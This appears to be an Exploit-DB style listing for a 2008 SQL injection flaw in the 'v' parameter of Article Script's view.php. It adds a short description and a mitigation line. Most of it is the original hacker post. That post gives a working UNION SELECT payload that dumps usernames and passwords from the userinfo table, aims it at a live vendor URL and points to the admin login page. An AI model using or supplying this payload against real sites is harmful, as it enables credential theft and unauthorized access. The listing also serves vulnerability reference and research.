Article Script (view.php v ) Remote SQL Injection Vulnerability

vendor:

Article Script

by:

Hussin X

8.8

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Article Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Article Script (view.php v ) Remote SQL Injection Vulnerability

A vulnerability in the view.php file of the Article Script allows an attacker to inject arbitrary SQL commands. An attacker can exploit this issue by manipulating the 'v' parameter in a malicious manner when requesting the vulnerable page. This can allow the attacker to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and possibly compromise the underlying system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use the lowest privileges necessary to perform its function.

Source

Exploit-DB raw data:

|___________________________________________________|
|
| Article Script (view.php v ) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.IQ-ty.CoM |  WwW.TrYaG.CC
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|
|___________________________________________________
|                                                   |
|
| script : http://www.availscript.com/article_script.php
|
| DorK   : :)
|___________________________________________________|



Exploit:
________



www.[target].com/Script/view.php?v=-9+union+select+1,2,3,4,5,4,7,UserName,Password,10,11,12+FROM+userinfo--



L!VE DEMO:


http://www.availscript.com/article_script/view.php?v=-9+union+select+1,2,3,4,5,4,7,UserName,Password,10,11,12+FROM+userinfo--



Login :

www.[target].com/Script/admin/login.php




____________________________( Greetz )_________________________________
|
|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
|______________________________________________________________________


                             Im IRAQi

# milw0rm.com [2008-09-21]